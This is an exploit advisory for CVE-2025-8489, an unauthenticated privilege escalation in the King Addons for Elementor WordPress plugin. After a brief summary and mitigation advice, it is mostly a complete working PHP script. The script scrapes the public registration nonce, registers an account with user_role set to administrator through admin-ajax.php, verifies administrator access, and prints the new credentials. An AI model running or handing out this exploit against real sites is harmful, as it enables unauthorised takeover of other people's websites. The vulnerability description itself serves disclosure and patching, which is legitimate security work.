=============================================================================================================================================
| # Title : WordPress King Addons for Elementor 24.12.92 to 51.1.14 Unauthenticated Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/king-addons/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212728/ & CVE-2025-8489
[+] Summary : The vulnerability is in the handle_register_ajax() function of the King Addons plugin. The AJAX registration handler performs no authorization check and does not restrict the value of the user_role parameter it receives, so an unauthenticated visitor can register a new account and pick its role - including "administrator". Sites on an affected version (24.12.92 through 51.1.14) should update the plugin; until then, taking the "Login Register Form" widget off public pages removes the nonce this PoC depends on (other exposure paths are not ruled out here).
[+] Attack Vector :
 Unauthenticated Registration: attackers can register new users without holding any account on the site.
 Role Manipulation: the user_role POST parameter can be set to "administrator".
 Nonce Requirement: the request must carry a valid registration nonce. This is not a real barrier: a WordPress nonce only ties the request to a page load and is not an authentication or authorization check, and the widget prints it into the page source (king_addons_login_register_vars.register_nonce) of any page containing the "Login Register Form" widget, where any visitor can read it.
[+] POC : php poc.php https://vulnerable-site.com /register-page/ \
 --username indoushka \
 --password P@ssw0rd123!
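\ --email indoushka4ever@gmail.com

<?php
/**
 * Proof of concept for CVE-2025-8489: unauthenticated privilege escalation in the
 * King Addons for Elementor WordPress plugin. The plugin's handle_register_ajax()
 * handler accepts a caller-supplied user_role, so the registration request below
 * asks for "administrator"; the only thing it needs is the registration nonce,
 * which the "Login Register Form" widget prints into the page source for anyone.
 *
 * Only run this against systems you are explicitly authorised to test. The script
 * creates a persistent account on the target, which must be removed afterwards.
 *
 * NOTE(review): the original class header and constructor signature were lost when
 * this listing was extracted. They are reconstructed here from the CLI call site
 * (new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password,
 * $email)) and from the $this-> assignments that survived in the constructor body.
 */
class WordPressKingAddonsExploit
{
    /** Per-request timeout in seconds, so an unresponsive target cannot stall the run. */
    private const TIMEOUT = 30;

    /** User-Agent sent on every request (same value the original used). */
    private const USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';

    private $targetUrl;
    private $noncePage;
    private $username;
    private $password;
    private $email;

    /**
     * @param string $targetUrl Base URL of the WordPress site; a trailing slash is stripped.
     * @param string $noncePage Path of a page that renders the "Login Register Form" widget.
     * @param string $username  Username for the account to register.
     * @param string $password  Password for the account to register.
     * @param string $email     E-mail address for the account to register.
     */
    public function __construct($targetUrl, $noncePage, $username, $password, $email)
    {
        $this->targetUrl = rtrim($targetUrl, '/');
        $this->noncePage = $noncePage;
        $this->username = $username;
        $this->password = $password;
        $this->email = $email;
    }

    /**
     * Runs the full chain: locate the registration nonce, register an account with
     * user_role=administrator, then log in and confirm the role actually took.
     *
     * @return array|false ['username' => ..., 'password' => ..., 'cookie' => ...] once an
     *                     administrator session has been confirmed, false otherwise.
     */
    public function exploit()
    {
        echo "[*] Starting exploit for CVE-2025-8489\n";

        // Step 1: the widget exposes its nonce to unauthenticated visitors.
        echo "[*] Searching for nonce on page: {$this->noncePage}\n";
        $nonce = $this->findNonce();
        if ($nonce === null) {
            echo "[-] Failed to find nonce (is the Login Register Form widget on that page?)\n";
            return false;
        }
        echo "[+] Found nonce: $nonce\n";

        // Step 2: register with user_role=administrator.
        echo "[*] Creating administrator account\n";
        $status = $this->createAdminUser($nonce);
        if ($status === false) {
            echo "[-] Failed to create administrator account\n";
            return false;
        }
        if ($status === 'exists') {
            // Nothing was created by this run and the existing account's password is
            // unknown to us; the earlier version wrongly reported success here.
            echo "[!] Account already exists - it was NOT created by this run; trying the supplied password\n";
        } else {
            echo "[+] Account registered\n";
        }
        echo "[*] Username: {$this->username}\n";
        echo "[*] Password: {$this->password}\n";

        // Step 3: log in and verify the role. A target that still registers the user
        // but ignores user_role (e.g. a patched build) must not be reported as pwned.
        echo "[*] Logging in and verifying administrator privileges\n";
        $adminCookie = $this->wordpressLogin();
        if ($adminCookie === false) {
            echo "[-] Failed to obtain an administrator session\n";
            return false;
        }
        echo "[+] Successfully logged in as an administrator\n";

        return [
            'username' => $this->username,
            'password' => $this->password,
            'cookie' => $adminCookie,
        ];
    }

    /**
     * Extracts register_nonce from the king_addons_login_register_vars object that the
     * widget localises into the page's JavaScript.
     *
     * @return string|null The nonce, or null when the page or the object is missing.
     */
    private function findNonce()
    {
        $url = $this->targetUrl . '/' . ltrim($this->noncePage, '/');
        $html = $this->httpGet($url);
        if ($html === false) {
            return null;
        }

        // Non-greedy match up to the terminating "};" so a ';' inside a localised
        // string does not truncate the object (the earlier pattern stopped at the
        // first ';' anywhere). json_decode() handles the escaped slashes itself.
        if (!preg_match('/king_addons_login_register_vars\s*=\s*(\{.*?\})\s*;/s', $html, $m)) {
            return null;
        }
        $data = json_decode($m[1], true);
        if (!is_array($data) || empty($data['register_nonce'])) {
            return null;
        }
        return (string) $data['register_nonce'];
    }

    /**
     * Posts the registration request to admin-ajax.php with user_role=administrator.
     *
     * @param string $nonce Registration nonce scraped by findNonce().
     * @return string|false 'created' when the plugin reports success; 'exists' when it
     *                      reports the account already exists (nothing was created and
     *                      its password is unknown to us); false on any other outcome.
     */
    private function createAdminUser($nonce)
    {
        $ajaxUrl = $this->targetUrl . '/wp-admin/admin-ajax.php';
        $postData = [
            'action' => 'king_addons_user_register',
            'nonce' => $nonce,
            'username' => $this->username,
            'email' => $this->email,
            'password' => $this->password,
            'confirm_password' => $this->password,
            'user_role' => 'administrator',
            'terms_required' => 'no',
        ];

        $response = $this->httpPost($ajaxUrl, $postData);
        if ($response === false) {
            return false;
        }

        $json = json_decode($response, true);
        if (!is_array($json) || !isset($json['success'])) {
            echo "[-] Unexpected response from admin-ajax.php: " . substr($response, 0, 200) . "\n";
            return false;
        }
        if ($json['success'] === true) {
            return 'created';
        }

        $errorMsg = isset($json['data']['message']) ? (string) $json['data']['message'] : '';
        if (preg_match('/(already exists|username.*taken|user.*exists)/i', $errorMsg)) {
            return 'exists';
        }
        if ($errorMsg !== '') {
            echo "[-] Registration rejected: $errorMsg\n";
        }
        return false;
    }

    /**
     * Logs in through wp-login.php and returns a Cookie header value for the session,
     * but only if the account can open wp-admin/users.php. Every logged-in role gets
     * the dashboard and the admin bar, so the dashboard check the earlier version
     * relied on did not prove the escalation worked.
     *
     * @return string|false Cookie header value for a confirmed administrator session,
     *                      false on login failure or when the account is not an administrator.
     */
    private function wordpressLogin()
    {
        $loginUrl = $this->targetUrl . '/wp-login.php';
        $postData = [
            'log' => $this->username,
            'pwd' => $this->password,
            'wp-submit' => 'Log In',
            'redirect_to' => $this->targetUrl . '/wp-admin/',
            'testcookie' => '1',
        ];

        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $loginUrl,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($postData),
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => true,
            CURLOPT_FOLLOWLOCATION => true,
            // An empty COOKIEFILE enables curl's in-memory cookie engine (needed so the
            // redirect carries the freshly set auth cookies) without persisting the
            // session to a cookie.txt in the working directory as the earlier version did.
            CURLOPT_COOKIEFILE => '',
            CURLOPT_HTTPHEADER => [
                'Content-Type: application/x-www-form-urlencoded',
                'Referer: ' . $loginUrl,
            ],
            CURLOPT_USERAGENT => self::USER_AGENT,
            CURLOPT_TIMEOUT => self::TIMEOUT,
        ]);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        if ($response === false || ($httpCode !== 200 && $httpCode !== 302)) {
            return false;
        }

        // Collect every Set-Cookie across the redirect chain; later values win.
        // Split on the first '=' rather than parse_str(), which url-decodes values
        // and rewrites cookie names containing '.' or spaces.
        preg_match_all('/^Set-Cookie:\s*([^=;\r\n]+)=([^;\r\n]*)/mi', $response, $matches, PREG_SET_ORDER);
        $cookies = [];
        foreach ($matches as $m) {
            $cookies[trim($m[1])] = $m[2];
        }
        if ($cookies === []) {
            return false;
        }
        $pairs = [];
        foreach ($cookies as $name => $value) {
            $pairs[] = "$name=$value";
        }
        $cookieStr = implode('; ', $pairs);

        // First confirm the session is authenticated at all.
        $dashboard = $this->httpGet($this->targetUrl . '/wp-admin/', $cookieStr);
        if ($dashboard === false || strpos($dashboard, 'wp-admin-bar') === false) {
            echo "[-] Login failed (no authenticated dashboard)\n";
            return false;
        }

        // Then confirm the role: core WordPress answers users.php with a 403 wp_die()
        // for accounts lacking the list_users capability (administrator-only by
        // default), and httpGet() only returns a body on HTTP 200.
        $usersPage = $this->httpGet($this->targetUrl . '/wp-admin/users.php', $cookieStr);
        if ($usersPage === false) {
            echo "[!] Logged in, but the account is NOT an administrator - the target may ignore user_role (patched?)\n";
            return false;
        }

        return $cookieStr;
    }

    /**
     * Intentionally unimplemented. The original author left this as a stub that only
     * prints a warning and returns false; no upload is performed here and none is
     * added by this revision.
     *
     * @param string $adminCookie Unused.
     * @return false
     */
    public function uploadMaliciousPlugin($adminCookie)
    {
        echo "[*] Warning: This function demonstrates file upload capability\n";
        echo "[*] For educational purposes only!\n";
        // An actual plugin upload would need ZIP creation and the WordPress upload
        // flow; deliberately not implemented in this proof of concept.
        return false;
    }

    /**
     * HTTP GET.
     *
     * @param string $url
     * @param string $cookie Optional Cookie header value.
     * @return string|false Response body on HTTP 200, false otherwise.
     */
    private function httpGet($url, $cookie = '')
    {
        return $this->request($url, null, $cookie);
    }

    /**
     * HTTP POST with a form-encoded body.
     *
     * @param string $url
     * @param array  $data   Form fields.
     * @param string $cookie Optional Cookie header value.
     * @return string|false Response body on HTTP 200, false otherwise.
     */
    private function httpPost($url, $data, $cookie = '')
    {
        return $this->request($url, $data, $cookie);
    }

    /**
     * Shared cURL transport behind httpGet()/httpPost(): follows redirects, sends the
     * optional Cookie header and gives up after self::TIMEOUT seconds (the earlier
     * copies had no timeout, so an unresponsive host hung the run).
     *
     * @param string     $url
     * @param array|null $data   null for GET; form fields for POST.
     * @param string     $cookie Cookie header value, '' for none.
     * @return string|false Response body on HTTP 200, false on transport error or any other status.
     */
    private function request($url, $data, $cookie)
    {
        $opts = [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_USERAGENT => self::USER_AGENT,
            CURLOPT_TIMEOUT => self::TIMEOUT,
        ];
        if ($data !== null) {
            $opts[CURLOPT_POST] = true;
            $opts[CURLOPT_POSTFIELDS] = http_build_query($data);
        }
        if ($cookie !== '') {
            $opts[CURLOPT_COOKIE] = $cookie;
        }

        $ch = curl_init();
        curl_setopt_array($ch, $opts);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        return ($response !== false && $httpCode === 200) ? $response : false;
    }
}

/**
 * Command-line entry point.
 *
 *   php poc.php <target_url> <nonce_page_path> [--username U] [--password P] [--email E]
 */
if (php_sapi_name() === 'cli') {
    echo "=== WordPress King Addons Exploit (CVE-2025-8489) ===\n\n";

    if ($argc < 3) {
        echo "Usage: php " . basename(__FILE__) . " [target_url] [nonce_page_path]\n";
        echo "Example: php exploit.php https://example.com /page-with-form/\n\n";
        echo "Optional parameters:\n";
        echo " --username [username] (default: random)\n";
        echo " --password [password] (default: random)\n";
        echo " --email [email] (default: random)\n";
        exit(1);
    }

    $targetUrl = $argv[1];
    $noncePage = $argv[2];

    // Defaults. The earlier version derived all three from md5(time()), which anyone
    // who knows roughly when the run happened can reproduce - and this is an
    // administrator password being planted on a live site. Use a CSPRNG instead.
    $username = 'admin_' . bin2hex(random_bytes(4));
    $password = bin2hex(random_bytes(12));
    $email = bin2hex(random_bytes(4)) . '@example.com';

    for ($i = 3; $i < $argc; $i++) {
        if ($argv[$i] === '--username' && isset($argv[$i + 1])) {
            $username = $argv[++$i];
        } elseif ($argv[$i] === '--password' && isset($argv[$i + 1])) {
            $password = $argv[++$i];
        } elseif ($argv[$i] === '--email' && isset($argv[$i + 1])) {
            $email = $argv[++$i];
        } else {
            echo "[!] Ignoring unrecognised argument: {$argv[$i]}\n";
        }
    }

    $exploit = new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password, $email);
    $result = $exploit->exploit();

    if ($result !== false) {
        echo "\n[+] Exploit successful!\n";
        echo "[+] Administrator credentials:\n";
        echo " URL: " . $targetUrl . "/wp-admin/\n";
        echo " Username: " . $result['username'] . "\n";
        echo " Password: " . $result['password'] . "\n";
        echo "\n[!] Important: Remove the created user after testing!\n";
    } else {
        echo "\n[-] Exploit failed\n";
    }
} else {
    echo "This script is intended for command line use.\n";
}
?>
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================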